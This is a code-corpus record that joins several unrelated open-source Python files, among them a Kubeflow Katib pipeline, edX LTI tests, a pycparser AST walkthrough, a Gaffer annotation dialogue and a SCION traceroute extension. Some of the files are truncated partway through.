# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GetModelEvaluation
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
|
# python3 -m pip install google-cloud-aiplatform
# [START aiplatform_v1_generated_ModelService_GetModelEvaluation_async]
from google.cloud import aiplatform_v1
async def sample_get_model_evaluation():
    # Create a client
    client = aiplatform_v1.ModelServiceAsyncClient()

    # Initialize request argument(s)
    request = aiplatform_v1.GetModelEvaluationRequest(
        name="name_value",
    )

    # Make the request
    response = await client.get_model_evaluation(request=request)

    # Handle the response
    print(response)

# [END aiplatform_v1_generated_ModelService_GetModelEvaluation_async]
|
kubeflow/pipelines
|
samples/contrib/kubeflow-katib/mpi-job-horovod.py
|
Python
|
apache-2.0
| 8,891
| 0.001462
|
# Kubeflow Pipeline with Katib component.
# In this example you will create Katib Experiment using Bayesian optimization algorithm.
# As a Trial template you will use Kubeflow MPIJob with Horovod MNIST training container.
# After that, you will compile a Kubeflow Pipeline with your Katib Experiment.
# Use Kubeflow Pipelines UI to upload the Pipeline and create the Experiment and Run.
# This Experiment is similar to this: https://github.com/kubeflow/katib/blob/master/examples/v1beta1/kubeflow-training-operator/mpijob-horovod.yaml
# Check the training container source code here: https://github.com/kubeflow/mpi-operator/tree/master/examples/horovod.
# Note: To run this example, your Kubernetes cluster should run MPIJob operator.
# Follow this guide to install MPIJob on your cluster: https://www.kubeflow.org/docs/components/training/mpi/
import kfp
import kfp.dsl as dsl
from kfp import components
from kubeflow.katib import ApiClient
from kubeflow.katib import V1beta1ExperimentSpec
from kubeflow.katib import V1beta1AlgorithmSpec
from kubeflow.katib import V1beta1AlgorithmSetting
from kubeflow.katib import V1beta1ObjectiveSpec
from kubeflow.katib import V1beta1ParameterSpec
from kubeflow.katib import V1beta1FeasibleSpace
from kubeflow.katib import V1beta1TrialTemplate
from kubeflow.katib import V1beta1TrialParameterSpec
@dsl.pipeline(
name="Launch Katib MPIJob Experiment",
description="An example to launch Katib Experiment with MPIJob"
)
def horovod_mnist_hpo(
experiment_name: str = "mpi-horovod-mnist",
experiment_namespace: str = "kubeflow-user-example-com",
):
# Trial count specification.
max_trial_count = 6
max_failed_trial_count = 3
parallel_trial_count = 2
# Objective specification.
objective = V1beta1ObjectiveSpec(
type="minimize",
goal=0.01,
objective_metric_name="loss",
)
# Algorithm specification.
algorithm = V1beta1AlgorithmSpec(
algorithm_name="bayesianoptimization",
algorithm_settings=[
V1beta1AlgorithmSetting(
name="random_state",
value="10"
)
]
)
# Experiment search space.
# In this example we tune learning rate and number of training steps.
parameters = [
V1beta1ParameterSpec(
name="lr",
parameter_type="double",
feasible_space=V1beta1FeasibleSpace(
min="0.001",
max="0.003"
),
),
V1beta1ParameterSpec(
name="num-steps",
parameter_type="int",
feasible_space=V1beta1FeasibleSpace(
min="50",
max="150",
step="10"
),
),
]
# JSON template specification for the Trial's Worker Kubeflow MPIJob.
trial_spec = {
"apiVersion": "kubeflow.org/v1",
"kind": "MPIJob",
"spec": {
"slotsPerWorker": 1,
"cleanPodPolicy": "Running",
"mpiReplicaSpecs": {
"Launcher": {
"replicas": 1,
"template": {
"metadata": {
"annotations": {
"sidecar.istio.io/inject": "false"
}
},
"spec": {
"containers": [
{
"image": "docker.io/kubeflow/mpi-horovod-mnist",
"name": "mpi-launcher",
"command": [
"mpirun"
],
"args": [
"-np",
"2",
"--allow-run-as-root",
"-bind-to",
"none",
"-map-by",
"slot",
"-x",
"LD_LIBRARY_PATH",
|
"-x",
"PATH",
"-mca",
"pml",
"ob1",
"-mca",
"btl",
"^openib",
"python",
"/examples/tensorflow_mnist.
|
py",
"--lr",
"${trialParameters.learningRate}",
"--num-steps",
"${trialParameters.numberSteps}"
],
"resources": {
"limits": {
"cpu": "500m",
"memory": "2Gi"
}
}
}
]
}
}
},
"Worker": {
"replicas": 2,
"template": {
"metadata": {
"annotations": {
"sidecar.istio.io/inject": "false"
}
},
"spec": {
"containers": [
{
"image": "docker.io/kubeflow/mpi-horovod-mnist",
"name": "mpi-worker",
"resources": {
"limits": {
"cpu": "500m",
"memory": "4Gi"
}
}
}
]
}
}
}
}
}
}
# Configure parameters for the Trial template.
trial_template = V1beta1TrialTemplate(
primary_pod_labels={
"mpi-job-role": "launcher"
},
primary_container_name="mpi-launcher",
success_condition='status.conditions.#(type=="Succeeded")#|#(status=="True")#',
failure_condition='status.conditions.#(type=="Failed")#|#(status=="True")#',
trial_parameters=[
V1beta1TrialParameterSpec(
name="learningRate",
description="Learning rate for the training model",
reference="lr"
),
V1beta1TrialParameterSpec(
name="numberSteps",
description="Number of training steps",
reference="num-steps"
),
],
trial_spec=trial_spec
)
# Create Experiment specification.
experiment_spec = V1beta1ExperimentSpec(
max_trial_count=max_trial_count,
max_failed_trial_count=max_failed_trial_count,
parallel_trial_count=parallel_trial_count,
objective=objective,
algorithm=algorithm,
parameters=parameters,
trial_template=trial_template
)
# Get the Katib launcher.
# Load component from the URL or from the file.
katib_experiment_launcher_op = components.load_component_from_url(
"https://raw.githubusercontent.com/kubeflow/pipelines/master/components/kubeflow/katib-launcher/component.yaml")
# katib_experiment_launcher_op = components.load_component_from_file(
# "../../../components/kubeflow/katib-launcher/component.yaml"
# )
# Katib launcher component.
# Experi
|
nesaro/driza
|
pyrqt/carga/operaciones/compmedsim.py
|
Python
|
gpl-2.0
| 3,492
| 0.024482
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#Copyright (C) 2006 Inmaculada Luengo Merino, Néstor Arocha Rodríguez
#This file is part of pyrqt.
#
#pyrqt is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#
#pyrqt is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with pyrqt; if not, write to the Free Software
#Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Ejecuta una comparacion de medias simple"""
nombre=u"Comparación de medias simple"
tipo="Calculo"
diccionarioalternativa={ "nombre":u"Hipótesis alternativa", "tipo":"SeleccionSimple", "opciones":["<",">","!="]}
significacion={"nombre":u"Significación","tipo":"EntradaTexto"}
mediaobjetivo={"nombre":"Media objetivo","tipo":"EntradaTexto"}
widget={"tipo":"CalculoSimple","opciones":[mediaobjetivo,significacion,diccionarioalternativa]}
def funcion(dato, variable, caso, opciones):
    """Run R's one-sample t-test on the selected column and return its result dict.

    Fixed: two statements were split mid-identifier by an extraction artifact
    ('lis/ta' and 'alternativ/e'); rejoined here.
    """
    from rpy import r  # pylint: disable=import-error
    lista = [float(x) for x in dato.getCol(variable, caso=caso)]
    # map the UI's alternative-hypothesis symbol onto R's naming
    if opciones[u"Hipótesis alternativa"] == ">":
        lateral = "greater"
    elif opciones[u"Hipótesis alternativa"] == "<":
        lateral = "less"
    else:
        lateral = "two.sided"
    diccionario = r.t_test(lista, alternative=lateral,
                           mu=float(opciones["Media objetivo"]),
                           conf_level=float(opciones[u"Significación"]) / 100)
    # stash the confidence level so the reporting code can compare p-values
    diccionario["confianza"] = float(opciones[u"Significación"]) / 100
    return diccionario
def initresultado(resultado, opciones):
    """Initialize the result object, adding whatever the report needs."""
    resultado.addTablaSimple("resultado")
    resultado["resultado"].titulo = u"Prueba de Hipótesis"
    columnas = []
    if opciones["caso"]:
        columnas.append("Caso")
    columnas.extend([u"Hipótesis alternativa", "Intervalo de confianza",
                     "Valor p obtenido", "Conclusion"])
    resultado["resultado"].settitulo(columnas)
def interfazresultado(resultado, listaopciones, floatrender=None):
    """Fill one row of the result table from the t-test output."""
    variable = listaopciones[0]
    caso = listaopciones[1]
    diccionario = listaopciones[2]
    fila = []
    if caso:
        fila.append(caso)
    fila.append(diccionario["alternative"])
    fila.append(diccionario["conf.int"])
    fila.append(diccionario["p.value"])
    # reject H0 when the p-value falls below the stored confidence level
    if diccionario["p.value"] < diccionario["confianza"]:
        conclusion = u"Hay evidencias estadísticas de que la hipótesis alternativa es válida"
    else:
        conclusion = u"No hay evidencias estadísticas de que la hipótesis alternativa sea válida"
    fila.append(conclusion)
    resultado["resultado"].set(variable, fila)
def comprobarentrada(opciones):
    """Raise OpcionesIncorrectaException unless both required options are present."""
    requeridas = (u"Significación", "Media objetivo")
    if any(clave not in opciones for clave in requeridas):
        from pyrqt.excepciones import OpcionesIncorrectaException
        raise OpcionesIncorrectaException
# Placeholder hooks -- presumably required by the pyrqt operation-plugin
# interface; confirm against the plugin loader.
def funcionprincipal(): pass

def funcionchequeocondiciones(interfazdato): return False

def funcionchequeoentradausuario(opciones): return False

definicionresultado = []
# NOTE(review): `tipo` and `widget` below rebind the values assigned near the
# top of this module; these later values win at import time.
tipo = "Casos" #FIXME: Tipo incorrecto
etiquetas = ["Otros"]
widget = {"tipo":"Variable", "opciones":[]}
|
agry/NGECore2
|
scripts/mobiles/generic/static/tatooine/staticstorm.py
|
Python
|
lgpl-3.0
| 1,106
| 0.027125
|
import sys
from services.spawn import MobileTemplate
from services.spawn import WeaponTemplate
from resources.datatables import WeaponType
from resources.datatables import Difficulty
from resources.datatables import Options
from java.util import Vector
def addTemplate(core):
    """Register the static 'staticstorm' Stormtrooper mobile template.

    Fixed: two statements were split mid-identifier by an extraction artifact
    ('V/ector()' and 'attack/s'); rejoined here.
    """
    mobileTemplate = MobileTemplate()
    mobileTemplate.setCustomName('a Stormtrooper')
    mobileTemplate.setLevel(1)
    mobileTemplate.setDifficulty(Difficulty.NORMAL)
    mobileTemplate.setSocialGroup("township")
    mobileTemplate.setOptionsBitmask(Options.INVULNERABLE)
    templates = Vector()
    templates.add('object/mobile/shared_stormtrooper.iff')
    mobileTemplate.setTemplates(templates)
    weaponTemplates = Vector()
    weapontemplate = WeaponTemplate('object/weapon/melee/unarmed/shared_unarmed_default.iff', WeaponType.UNARMED, 1.0, 6, 'kinetic')
    weaponTemplates.add(weapontemplate)
    mobileTemplate.setWeaponTemplateVector(weaponTemplates)
    attacks = Vector()
    mobileTemplate.setDefaultAttack('creatureMeleeAttack')
    mobileTemplate.setAttacks(attacks)
    core.spawnService.addMobileTemplate('staticstorm', mobileTemplate)
    return
|
hradec/gaffer
|
python/GafferUI/AnnotationsUI.py
|
Python
|
bsd-3-clause
| 5,068
| 0.040055
|
##########################################################################
#
# Copyright (c) 2021, Cinesite VFX Ltd. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of Cinesite VFX Ltd. nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import imath
import IECore
import Gaffer
import GafferUI
def appendNodeContextMenuDefinitions( graphEditor, node, menuDefinition ) :
	"""Append "Annotate..." items for `node` to a GraphEditor context menu.

	Fixed : the definition was split mid-identifier by an extraction artifact
	('appendNodeContextMenu/Definitions' and 'Gaffer/.MetadataAlgo') ; rejoined.
	"""

	def append( menuPath, name ) :
		# Each item opens the annotation dialogue ; disabled for read-only nodes.
		menuDefinition.append(
			menuPath,
			{
				"command" : functools.partial( __annotate, node, name ),
				"active" : not Gaffer.MetadataAlgo.readOnly( node ),
			}
		)

	names = Gaffer.MetadataAlgo.annotationTemplates( userOnly = True )
	if not names :
		# No user templates registered : offer a single free-form item.
		append( "/Annotate...", "user" )
	else :
		for name in names :
			append(
				"/Annotate/{}...".format( IECore.CamelCase.toSpaced( name ) ),
				name
			)
		menuDefinition.append( "/Annotate/Divider", { "divider" : True } )
		append( "/Annotate/User...", "user" )
def __annotate( node, name, menu ) :
	# Menu command : open the annotation dialogue, parented to the menu's window.
	dialogue = __AnnotationsDialogue( node, name )
	dialogue.wait( parentWindow = menu.ancestor( GafferUI.Window ) )
class __AnnotationsDialogue( GafferUI.Dialogue ) :
	"""Modal dialogue for adding, editing or removing one annotation on a node."""

	def __init__( self, node, name ) :

		GafferUI.Dialogue.__init__( self, "Annotate" )

		self.__node = node
		self.__name = name

		# An annotation template fixes the colour, so the colour chooser is
		# only shown for free-form (non-template) annotations.
		template = Gaffer.MetadataAlgo.getAnnotationTemplate( name )
		annotation = Gaffer.MetadataAlgo.getAnnotation( node, name ) or template

		with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing = 4 ) as layout :
			self.__textWidget = GafferUI.MultiLineTextWidget(
				text = annotation.text() if annotation else "",
			)
			self.__textWidget.textChangedSignal().connect(
				Gaffer.WeakMethod( self.__updateButtonStatus ), scoped = False
			)
			if not template :
				self.__colorChooser = GafferUI.ColorChooser(
					annotation.color() if annotation else imath.Color3f( 0.15, 0.26, 0.26 ),
					useDisplayTransform = False
				)
				self.__colorChooser.colorChangedSignal().connect(
					Gaffer.WeakMethod( self.__updateButtonStatus ), scoped = False
				)
			else :
				self.__colorChooser = None

		self._setWidget( layout )

		self.__cancelButton = self._addButton( "Cancel" )
		self.__removeButton = self._addButton( "Remove" )
		self.__annotateButton = self._addButton( "Annotate" )

		self.__updateButtonStatus()

	def wait( self, **kw ) :
		"""Run the dialogue modally, applying the chosen action in an undoable block."""
		button = self.waitForButton( **kw )
		if button is self.__cancelButton or button is None :
			return
		with Gaffer.UndoScope( self.__node.scriptNode() ) :
			if button is self.__removeButton :
				Gaffer.MetadataAlgo.removeAnnotation( self.__node, self.__name )
			else :
				Gaffer.MetadataAlgo.addAnnotation(
					self.__node, self.__name,
					self.__makeAnnotation()
				)

	def __updateButtonStatus( self, *unused ) :
		# Enable each button only when pressing it would actually change something.
		existingAnnotation = Gaffer.MetadataAlgo.getAnnotation( self.__node, self.__name )
		newAnnotation = self.__makeAnnotation()
		self.__cancelButton.setEnabled( newAnnotation != existingAnnotation )
		self.__removeButton.setEnabled( bool( existingAnnotation ) )
		self.__annotateButton.setEnabled( bool( newAnnotation ) and newAnnotation != existingAnnotation )

	def __makeAnnotation( self ) :
		# Empty text means "no annotation" ; colour is included only when the
		# colour chooser is present (i.e. for non-template annotations).
		if not self.__textWidget.getText() :
			return Gaffer.MetadataAlgo.Annotation()
		if self.__colorChooser is not None :
			return Gaffer.MetadataAlgo.Annotation(
				self.__textWidget.getText(),
				self.__colorChooser.getColor()
			)
		else :
			return Gaffer.MetadataAlgo.Annotation( self.__textWidget.getText() )
|
stvstnfrd/edx-platform
|
lms/djangoapps/courseware/tests/test_lti_integration.py
|
Python
|
agpl-3.0
| 9,253
| 0.00281
|
"""LTI integration tests"""
import json
from collections import OrderedDict
import mock
import oauthlib
import six
from django.conf import settings
from django.urls import reverse
from six import text_type
from lms.djangoapps.courseware.tests.helpers import BaseTestXmodule
from lms.djangoapps.courseware.views.views import get_course_lti_endpoints
from openedx.core.lib.url_utils import quote_slashes
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from xmodule.x_module import STUDENT_VIEW
class TestLTI(BaseTestXmodule):
"""
Integration test for lti xmodule.
It checks overall code, by assuring that context that goes to template is correct.
As part of that, checks oauth signature generation by mocking signing function
of `oauthlib` library.
"""
CATEGORY = "lti"
def setUp(self):
    """
    Mock oauth1 signing of requests library for testing.

    Builds the exact LTI launch parameters the module is expected to
    produce, then patches ``oauthlib.oauth1.Client.sign`` so the nonce,
    timestamp and signature are deterministic and comparable verbatim.
    """
    super(TestLTI, self).setUp()  # lint-amnesty, pylint: disable=super-with-arguments
    # Fixed stand-ins for the values oauthlib normally randomises.
    mocked_nonce = u'135685044251684026041377608307'
    mocked_timestamp = u'1234567890'
    mocked_signature_after_sign = u'my_signature%3D'
    mocked_decoded_signature = u'my_signature='

    # Note: this course_id is actually a course_key
    context_id = text_type(self.item_descriptor.course_id)
    user_id = text_type(self.item_descriptor.xmodule_runtime.anonymous_student_id)
    hostname = self.item_descriptor.xmodule_runtime.hostname
    resource_link_id = text_type(six.moves.urllib.parse.quote('{}-{}'.format(hostname,
                                                                             self.item_descriptor.location.html_id()
                                                                             )))
    # sourcedid ties grade passback to (course, resource, user).
    sourcedId = "{context}:{resource_link}:{user_id}".format(
        context=six.moves.urllib.parse.quote(context_id),
        resource_link=resource_link_id,
        user_id=user_id
    )
    self.correct_headers = {
        u'user_id': user_id,
        u'oauth_callback': u'about:blank',
        u'launch_presentation_return_url': '',
        u'lti_message_type': u'basic-lti-launch-request',
        u'lti_version': 'LTI-1p0',
        u'roles': u'Student',
        u'context_id': context_id,
        u'resource_link_id': resource_link_id,
        u'lis_result_sourcedid': sourcedId,
        u'oauth_nonce': mocked_nonce,
        u'oauth_timestamp': mocked_timestamp,
        u'oauth_consumer_key': u'',
        u'oauth_signature_method': u'HMAC-SHA1',
        u'oauth_version': u'1.0',
        u'oauth_signature': mocked_decoded_signature
    }

    # Keep a reference to the real signer so the mock can delegate to it.
    saved_sign = oauthlib.oauth1.Client.sign

    self.expected_context = {
        'display_name': self.item_descriptor.display_name,
        'input_fields': self.correct_headers,
        'element_class': self.item_descriptor.category,
        'element_id': self.item_descriptor.location.html_id(),
        'launch_url': u'http://www.example.com',  # default value
        'open_in_a_new_page': True,
        'form_url': self.item_descriptor.xmodule_runtime.handler_url(self.item_descriptor,
                                                                     'preview_handler').rstrip('/?'),
        'hide_launch': False,
        'has_score': False,
        'module_score': None,
        'comment': u'',
        'weight': 1.0,
        'ask_to_send_username': self.item_descriptor.ask_to_send_username,
        'ask_to_send_email': self.item_descriptor.ask_to_send_email,
        'description': self.item_descriptor.description,
        'button_text': self.item_descriptor.button_text,
        'accept_grades_past_due': self.item_descriptor.accept_grades_past_due,
    }

    def mocked_sign(self, *args, **kwargs):
        """
        Mocked oauth1 sign function.

        Delegates to the real signer, then rewrites the Authorization
        header with the fixed nonce/timestamp/signature above.
        """
        # self is <oauthlib.oauth1.rfc5849.Client object> here:
        __, headers, __ = saved_sign(self, *args, **kwargs)
        # we should replace nonce, timestamp and signed_signature in headers:
        old = headers[u'Authorization']
        old_parsed = OrderedDict([param.strip().replace('"', '').split('=') for param in old.split(',')])
        old_parsed[u'OAuth oauth_nonce'] = mocked_nonce
        old_parsed[u'oauth_timestamp'] = mocked_timestamp
        old_parsed[u'oauth_signature'] = mocked_signature_after_sign
        headers[u'Authorization'] = ', '.join([k + '="' + v + '"' for k, v in old_parsed.items()])
        return None, headers, None

    patcher = mock.patch.object(oauthlib.oauth1.Client, "sign", mocked_sign)
    patcher.start()
    self.addCleanup(patcher.stop)
def test_lti_constructor(self):
    """Student-view rendering must equal the reference template output."""
    rendered = self.item_descriptor.render(STUDENT_VIEW).content
    reference = self.runtime.render_template('lti.html', self.expected_context)
    assert rendered == reference
def test_lti_preview_handler(self):
    """The preview handler body must equal the reference LTI form template."""
    rendered = self.item_descriptor.preview_handler(None, None).body
    reference = self.runtime.render_template('lti_form.html', self.expected_context)
    assert rendered.decode('utf-8') == reference
class TestLTIBlockListing(SharedModuleStoreTestCase):
"""
a test for the rest endpoint that lists LTI modules in a course
"""
# arbitrary constant
COURSE_SLUG = "100"
COURSE_NAME = "test_course"
@classmethod
def setUpClass(cls):
    """Create a course with two chapter/sequential branches so the
    published and draft LTI modules live in different sections."""
    super(TestLTIBlockListing, cls).setUpClass()
    cls.course = CourseFactory.create(display_name=cls.COURSE_NAME, number=cls.COURSE_SLUG)
    cls.chapter1 = ItemFactory.create(
        parent_location=cls.course.location,
        display_name="chapter1",
        category='chapter')
    cls.section1 = ItemFactory.create(
        parent_location=cls.chapter1.location,
        display_name="section1",
        category='sequential')
    cls.chapter2 = ItemFactory.create(
        parent_location=cls.course.location,
        display_name="chapter2",
        category='chapter')
    cls.section2 = ItemFactory.create(
        parent_location=cls.chapter2.location,
        display_name="section2",
        category='sequential')

    # creates one draft and one published lti module, in different sections
    cls.lti_published = ItemFactory.create(
        parent_location=cls.section1.location,
        display_name="lti published",
        category="lti",
        location=cls.course.id.make_usage_key('lti', 'lti_published'),
    )
    cls.lti_draft = ItemFactory.create(
        parent_location=cls.section2.location,
        display_name="lti draft",
        category="lti",
        location=cls.course.id.make_usage_key('lti', 'lti_draft'),
        publish_item=False,
    )
def expected_handler_url(self, handler):
    """Convenience method to get the reversed handler urls."""
    return "https://{}{}".format(settings.SITE_NAME, reverse(
        'xblock_handler_noauth',
        args=[
            text_type(self.course.id),
            quote_slashes(text_type(self.lti_published.scope_ids.usage_id)),
            handler
        ]
    ))
def test_lti_rest_bad_course(self):
    """Tests what happens when the lti listing rest endpoint gets a bad course_id"""
    bad_ids = [u"sf", u"dne/dne/dne", u"fo/ey/\\u5305"]
    for bad_course_id in bad_ids:
        lti_rest_endpoints_url = 'courses/{}/lti_rest_endpoints/'.format(bad_course_id)
        response = self.client.get(lti_rest_endpoints_url)
        # Malformed or unknown course keys must 404, never 500.
        assert 404 == response.status_code
def test_lti_rest_listing(self):
"""tests that the draft lti module is part of the endpoint response"""
request = mock.Mock()
request.method
|
kk1987/pycparser
|
examples/explore_ast.py
|
Python
|
bsd-3-clause
| 5,702
| 0.006314
|
#-----------------------------------------------------------------
# pycparser: explore_ast.py
#
# This example demonstrates how to "explore" the AST created by
# pycparser to understand its structure. The AST is a n-nary tree
# of nodes, each node having several children, each with a name.
# Just read the code, and let the comments guide you. The lines
# beginning with #~ can be uncommented to print out useful
# information from the AST.
# It helps to have the pycparser/_c_ast.cfg file in front of you.
#
# Copyright (C) 2008-2011, Eli Bendersky
# License: BSD
#-----------------------------------------------------------------
from __future__ import print_function
import sys
# This is not required if you've installed pycparser into
# your site-packages/ with setup.py
#
sys.path.insert(0, '..')
from pycparser import c_parser, c_ast
# This is some C source to parse. Note that pycparser must begin
# at the top level of the C file, i.e. with either declarations
# or function definitions (this is called "external declarations"
# in C grammar lingo)
#
# Also, a C parser must have all the types declared in order to
# build the correct AST. It doesn't matter what they're declared
# to, so I've inserted the dummy typedef in the code to let the
# parser know Hash and Node are types. You don't need to do it
# when parsing real, correct C code.
#
text = r"""
typedef int Node, Hash;
void HashPrint(Hash* hash, void (*PrintFunc)(char*, char*))
{
unsigned int i;
if (hash == NULL || hash->heads == NULL)
return;
for (i = 0; i < hash->table_size; ++i)
{
Node* temp = hash->heads[i];
while (temp != NULL)
{
PrintFunc(temp->entry->key, temp->entry->value);
temp = temp->next;
}
}
}
"""
# Create the parser and ask to parse the text. parse() will throw
# a ParseError if there's an error in the code
#
parser = c_parser.CParser()
ast = parser.parse(text, filename='<none>')
# Uncomment the following line to see the AST in a nice, human
# readable way. show() is the most useful tool in exploring ASTs
# created by pycparser. See the c_ast.py file for the options you
# can pass it.
#
#~ ast.show()
# OK, we've seen that the top node is FileAST. This is always the
# top node of the AST. Its children are "external declarations",
# and are stored in a list called ext[] (see _c_ast.cfg for the
# names and types of Nodes and their children).
# As you see from the printout, our AST has two Typedef children
# and one FuncDef child.
# Let's explore FuncDef more closely. As I've mentioned, the list
# ext[] holds the children of FileAST. Since the function
# definition is the third child, it's ext[2]. Uncomment the
# following line to show it:
#
#~ ast.ext[2].show()
# A FuncDef consists of a declaration, a list of parameter
# declarations (for K&R style function definitions), and a body.
# First, let's examine the declaration.
#
function_decl = ast.ext[2].decl
# function_decl, like any other declaration, is a Decl. Its type child
# is a FuncDecl, which has a return type and arguments stored in a
# ParamList node
#~ function_decl.type.show()
#~ function_decl.type.args.show()
# The following displays the name and type of each argument:
#
#~ for param_decl in function_decl.type.args.params:
#~ print('Arg name: %s' % param_decl.name)
#~ print('Type:')
#~ param_decl.type.show(offset=6)
# The body is of FuncDef is a Compound, which is a placeholder for a block
# surrounded by {} (You should be reading _c_ast.cfg parallel to this
# explanation and seeing these things by your own eyes).
#
# Let's see the block's declarations:
#
# Grab the function body (a Compound node) for further exploration.
function_body = ast.ext[2].body

# The following displays the declarations and statements in the function
# body
#
#~ for decl in function_body.block_items:
#~     decl.show()

# We can see a single variable declaration, i, declared to be a simple type
# declaration of type 'unsigned int', followed by statements.
#
# block_items is a list, so the third element is the For statement:
#
for_stmt = function_body.block_items[2]
#~ for_stmt.show()

# As you can see in _c_ast.cfg, For's children are 'init, cond,
# next' for the respective parts of the 'for' loop specifier,
# and stmt, which is either a single stmt or a Compound if there's
# a block.
#
# Let's dig deeper, to the while statement inside the for loop:
#
# Reconstructed from a garbled span: the while statement is the second
# item of the for loop's body.
while_stmt = for_stmt.stmt.block_items[1]
#~ while_stmt.show()

# While is simpler, it only has a condition node and a stmt node.
# The condition:
#
while_cond = while_stmt.cond
#~ while_cond.show()

# Note that it's a BinaryOp node - the basic constituent of
# expressions in our AST. BinaryOp is the expression tree, with
# left and right nodes as children. It also has the op attribute,
# which is just the string representation of the operator.
#
#~ print(while_cond.op)
#~ while_cond.left.show()
#~ while_cond.right.show()

#
# That's it for the example. I hope you now see how easy it is to
# explore the AST created by pycparser. Although on the surface it
# is quite complex and has a lot of node types, this is the
# inherent complexity of the C language every parser/compiler
# designer has to cope with.
# Using the tools provided by the c_ast package it's easy to
# explore the structure of AST nodes and write code that processes
# them.
# Specifically, see the cdecl.py example for a non-trivial
# demonstration of what you can do by recursively going through
# the AST.
#
FR4NK-W/osourced-scion
|
python/lib/packet/ext/traceroute.py
|
Python
|
apache-2.0
| 3,783
| 0
|
# Copyright 2015 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`traceroute` --- Traceroute extension header and its handler
=================================================================
"""
# Stdlib
import struct
# SCION
from lib.packet.ext_hdr import HopByHopExtension
from lib.packet.scion_addr import ISD_AS
from lib.util import Raw, SCIONTime
from lib.types import ExtHopByHopType
class TracerouteExt(HopByHopExtension):
    """
    Traceroute hop-by-hop extension. Wire layout:

    0b       8        16       24        32            48               64
    | next hdr | hdr len |  0x00  | hops_no |        (padding)          |
    |   ISD_0  |   AS_0  |     IFID_0      |       Timestamp_0         |
    |   ISD_1  |   AS_1  |     IFID_1      |       Timestamp_1         |
    ...
    |                     (padding) or HOP info                        |
    """
    NAME = "TracerouteExt"
    EXT_TYPE = ExtHopByHopType.TRACEROUTE
    PADDING_LEN = 4
    MIN_LEN = 1 + PADDING_LEN
    # Reconstructed from garbled source: one extension line per hop entry.
    HOP_LEN = HopByHopExtension.LINE_LEN  # Size of every hop information.

    def __init__(self, raw=None):  # pragma: no cover
        # List of (isd_as, if_id, timestamp) tuples; filled by _parse()
        # or append_hop().
        self.hops = []
        super().__init__(raw)
def _parse(self, raw):
    """
    Parse payload to extract hop informations.
    """
    hops_no = raw[0]
    data = Raw(raw, self.NAME, self.MIN_LEN + hops_no * self.HOP_LEN,
               min_=True)
    super()._parse(data)
    # Drop hops no and padding from the first row.
    data.pop(self.MIN_LEN)
    for _ in range(hops_no):
        isd_as = ISD_AS(data.pop(ISD_AS.LEN))  # 4 bytes
        if_id, timestamp = struct.unpack(
            "!HH", data.pop(self.HOP_LEN - ISD_AS.LEN))
        self.append_hop(isd_as, if_id, timestamp)
@classmethod
def from_values(cls, max_hops_no):  # pragma: no cover
    """Build an empty extension pre-sized to hold `max_hops_no` hops."""
    ext = TracerouteExt()
    ext._init_size(max_hops_no)
    return ext
def pack(self):
    """Serialise the payload: hop count, fixed padding, hop entries,
    then zero-fill for the hop slots allocated but not yet used."""
    parts = [struct.pack("!B", len(self.hops)), bytes(self.PADDING_LEN)]
    for isd_as, if_id, timestamp in self.hops:
        parts.append(isd_as.pack())
        parts.append(struct.pack("!HH", if_id, timestamp))
    # Compute and set padding for the rest of the payload.
    pad_hops = self._hdr_len - len(self.hops) - 1
    parts.append(bytes(pad_hops * self.HOP_LEN))
    raw = b"".join(parts)
    self._check_len(raw)
    return raw
def append_hop(self, isd_as, if_id, timestamp=None):  # pragma: no cover
    """
    Append hop's information as a new field in the extension.
    """
    # Check whether an allocated slot is still free: the header line takes
    # one of the _hdr_len lines, the rest are hop slots.
    assert len(self.hops) < self._hdr_len - 1
    if timestamp is None:
        # Truncate milliseconds to 2B
        timestamp = int(SCIONTime.get_time() * 1000) % 2**16
    self.hops.append((isd_as, if_id, timestamp))
